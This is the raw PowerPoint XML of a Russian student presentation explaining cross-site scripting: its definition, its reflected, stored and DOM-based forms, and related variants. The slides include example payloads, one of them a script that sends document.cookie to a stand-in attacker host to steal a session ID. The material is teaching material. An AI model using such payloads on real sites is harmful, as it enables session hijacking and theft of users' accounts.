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F%D1%8C%D1%8E%D1%82%D0%B5%D1%80" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/%D0%A1%D0%BA%D1%80%D0%B8%D0%BF%D1%82" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/%D0%92%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D0%BD%D1%8B%D0%B9_%D0%BA%D0%BE%D0%B4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2%D0%B5%D0%B1-%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B8%D1%86%D0%B0" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/%D0%92%D0%B5%D0%B1-%D0%BF%D1%80%D0%B8%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D1%81%D0%BA%D0%B0%D1%8F_%D0%B0%D1%82%D0%B0%D0%BA%D0%B0" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D1%81%D0%BA%D0%B0%D1%8F_%D0%B0%D1%82%D0%B0%D0%BA%D0%B0#%D0%98%D0%BD%D1%8A%D0%B5%D0%BA%D1%86%D0%B8%D1%8F_%D0%BA%D0%BE%D0%B4%D0%B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A%D0%B0%D1%81%D0%BA%D0%B0%D0%B4%D0%BD%D1%8B%D0%B5_%D1%82%D0%B0%D0%B1%D0%BB%D0%B8%D1%86%D1%8B_%D1%81%D1%82%D0%B8%D0%BB%D0%B5%D0%B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C%D0%B8%D0%B4%D0%B6%D0%B1%D0%BE%D1%80%D0%B4" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/%D0%92%D0%B5%D0%B1_2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0127C-3E24-436B-AF53-0217BE3A3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783" y="-351065"/>
            <a:ext cx="8762433" cy="2971801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Linux Libertine"/>
              </a:rPr>
              <a:t>Межсайтовый скриптинг</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Linux Libertine"/>
              </a:rPr>
            </a:b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624FFB-ADB9-4EFB-8299-09FC889AC645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579946" y="0"/>
            <a:ext cx="8762433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Cross-Site Scripting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8739701-3A02-4080-9C03-33FF72200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Доклад выполнил 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Драч Кирилл Алексеевич ИСИТ 3-1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39003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942C34-9278-4D07-814F-C3E90D2D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3" y="225645"/>
            <a:ext cx="1205080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1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5B6294-CA19-488C-96F0-6103C226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10" y="128899"/>
            <a:ext cx="7195212" cy="66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049951-D90A-49BC-94F8-D894C981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64" y="279241"/>
            <a:ext cx="825932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7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76E02C-C9DF-4276-8AF3-8E26755A680B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="58846"/>
            <a:ext cx="610280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 //////////////////////////////////////////////</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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BC4CF-A8C1-45EE-A26F-46549F1AA74D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63272" y="366622"/>
            <a:ext cx="610280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http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'http'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http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createServer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()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'POST'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'/message'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''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chunk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+=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chunk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toString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});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'end'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()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Получено сообщение:'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-R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Сообщение получено'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-R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});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 </a:t>
            </a:r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statusCode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404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Страница не найдена'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-R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});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});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="ru-R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process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env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||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3001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server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listen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()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`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-R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Сервер запущен на порту </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-R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EBD4B3-0BA4-4FDE-8BA4-39D25246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46" y="759175"/>
            <a:ext cx="583964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6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57D9C9-FA48-45CD-87EF-E7F14E49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77" y="476648"/>
            <a:ext cx="9749287" cy="60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4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3E4A47-0979-4B5B-875A-C6210A72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61" y="230344"/>
            <a:ext cx="8449007" cy="54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4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0F9C8B-A3F1-448A-BAAB-F7E2BF66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62" y="1921268"/>
            <a:ext cx="10619675" cy="301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0D68EFF3-CCF0-4D8D-8587-43814AEB4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110" y="3429000"/>
            <a:ext cx="7076821" cy="2665296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1FBD5-4CF9-4569-856D-BEE02346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29" y="162754"/>
            <a:ext cx="6449325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A2A392-1EF5-45C7-9177-30480FA4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647312"/>
            <a:ext cx="5487166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CF97B0-8E45-4CB5-A930-C40AA8FA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9" y="1974905"/>
            <a:ext cx="9965886" cy="25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F2D04-EB7F-4D48-9530-9152B3C4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8" y="364368"/>
            <a:ext cx="8534400" cy="1507067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XSS?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AFE9B-D959-4B55-AFB7-88447D3D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32" y="2081892"/>
            <a:ext cx="9455832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XSS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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="24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Site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Scripting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«межсайтовый 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Скрип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скриптинг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») подтип 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Хакерская ата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атаки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на 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Веб-приложе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веб-системы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заключающийся во внедрении в выдаваемую веб-системой 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Веб-страниц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страницу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Вредоносный к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вредоносного кода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(который будет выполнен на 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Компьюте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компьютере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пользователя при открытии им этой страницы) и взаимодействии этого кода с веб-сервером злоумышленника. Является разновидностью атаки «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 tooltip="Хакерская ата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Внедрение кода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2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825844-F1A1-4947-9CEC-C7260428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7" y="2314419"/>
            <a:ext cx="10765332" cy="12697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15A2ED-028A-4883-AB6A-D233CA0A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7" y="398237"/>
            <a:ext cx="10796677" cy="178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4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4DC772-15F6-4E6B-9E83-C93EF3E4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0"/>
            <a:ext cx="11250386" cy="6262007"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="4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термина используют сокращение «XSS», чтобы не было путаницы с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4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Каскадные таблицы стиле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каскадными таблицами стилей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4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использующими сокращение «CSS».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1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A9E2C-D37C-44B6-A41A-2E48CB55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948" y="168426"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Классификация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>атаки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8596E-16FF-441D-9D6D-6A709DA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7" y="563336"/>
            <a:ext cx="8534400" cy="3615267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Отражённые (непостоянные)</a:t>
            </a:r>
          </a:p>
          <a:p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DA396-DBDA-4B7E-B52C-B8022E6B7313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595993" y="2370969"/>
            <a:ext cx="99604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Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ru-RU" altLang="ru-RU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58B78-9052-4DE7-9944-BF4875E5CB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595993" y="4028839"/>
            <a:ext cx="97758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9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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/search.php?q=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ru-RU" altLang="ru-RU" sz="39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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ru-RU" altLang="ru-RU" sz="39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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;DoSomething();&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ru-RU" altLang="ru-RU" sz="39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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ru-RU" altLang="ru-RU" sz="39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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ru-RU" altLang="ru-RU" sz="3900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42743C-76FE-4B83-9021-A57159E0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85" y="1771651"/>
            <a:ext cx="9472158" cy="3615267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Если сайт не экранирует угловые скобки, преобразуя их в «&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;» и «&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;», получим скрипт на странице результатов поиска.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Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Если доверенный сайт уязвим для вектора XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.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9902FAB-91E6-4FDF-8F9E-DD97B9F655B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2161948" y="16842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Классификация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>xss </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>атаки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98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BD2D8E-9038-416B-9E79-FBE124A5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07"/>
            <a:ext cx="12192000" cy="42074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6D70B9-E67F-44BB-8D43-B33BCD478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89" y="4499911"/>
            <a:ext cx="10625011" cy="11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42847B-13E5-4EB5-8E4E-ABFD0E6810A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2161948" y="16842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Классификация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>xss </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>атаки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4C736-CC22-40EF-8E02-BF96ADA7A791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904195" y="1537998"/>
            <a:ext cx="61028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Хранимые (постоянные)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DCCD8-A180-461A-99A0-3046D8ACA35A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904195" y="2268141"/>
            <a:ext cx="1010126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200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Хранимый XSS является наиболее разрушительным типом атаки.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="ru-RU" sz="2200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Хранимый XSS возможен, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате без ограничений, а также другие сайты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2" tooltip="Веб 2.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Веб 2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (блоги, вики, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3" tooltip="Имиджбор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имиджборд</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), когда на сервере хранятся пользовательские тексты и рисунки. Скрипты вставляются в эти тексты и рисунки.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="ru-RU" sz="2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4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BF102B-05CD-4D3E-AACB-21A3099C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Фрагмент кода похищения ключа с идентификатором сессии (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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ID):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C9546-C1F2-4585-84EE-D9CA09813E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830715" y="3791929"/>
            <a:ext cx="8990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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" err="1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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="240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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" err="1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document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="240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="http://attackerhost.example/cgi-bin/cookiesteal.cgi?"+document.cookie&lt;/script&gt;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6947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377416-8A3C-4585-AA30-E2FBA970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549845" cy="5559879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS: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Этот тип атаки происходит на стороне клиента, когда вредоносный скрипт изменяет содержимое DOM (Document Object Model) на веб-странице.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Пример: Злоумышленник создает вредоносную ссылку, изменяющую содержимое страницы на сайте жертвы после загрузки.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client-Side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Template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Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (CSTI):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Этот тип атаки аналогичен DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS, но используется при использовании клиентских шаблонов, таких как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AngularJS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Handlebars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> и другие.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Пример: Злоумышленник внедряет вредоносный код в шаблон </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AngularJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, который впоследствии выполняется на стороне клиента.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() XSS: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Этот тип атаки происходит, когда вредоносный скрипт внедряется в страницу и использует </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() для вставки дополнительного HTML или скриптового кода.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Пример: Злоумышленник вставляет &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('вредоносный код');&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; в уязвимую страницу, что приводит к выполнению вредоносного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371046242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</TotalTime>
  <Words>750</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>59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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Linux Libertine</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Сектор</vt:lpstr>
      <vt:lpstr>Межсайтовый скриптинг </vt:lpstr>
      <vt:lpstr>Что такое XSS? </vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Классификация xss атаки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Межсайтовый скриптинг</dc:title>
  <dc:creator>Кирилл Драч</dc:creator>
  <cp:lastModifiedBy>Кирилл Драч</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-14T17:57:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-14T20:27:07Z</dcterms:modified>
</cp:coreProperties>
</file>